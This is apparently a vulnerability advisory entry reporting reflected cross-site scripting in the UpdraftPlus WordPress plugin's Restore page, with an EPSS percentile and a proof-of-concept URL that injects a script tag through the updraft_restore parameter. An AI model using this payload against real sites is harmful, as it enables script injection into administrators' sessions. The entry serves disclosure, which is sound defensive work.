EPSS
Percentile
41.8%
The plugin does not sanitise and escape the updraft_restore parameter before outputting it back in the Restore page, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/options-general.php?page=updraftplus&job;_id&updraft;_restore[0]=<script>alert(/XSS/)<%2Fscript>&action;=updraft_restore&backup;_timestamp=123&updraftplus;_ajax_restore=start_ajax_restore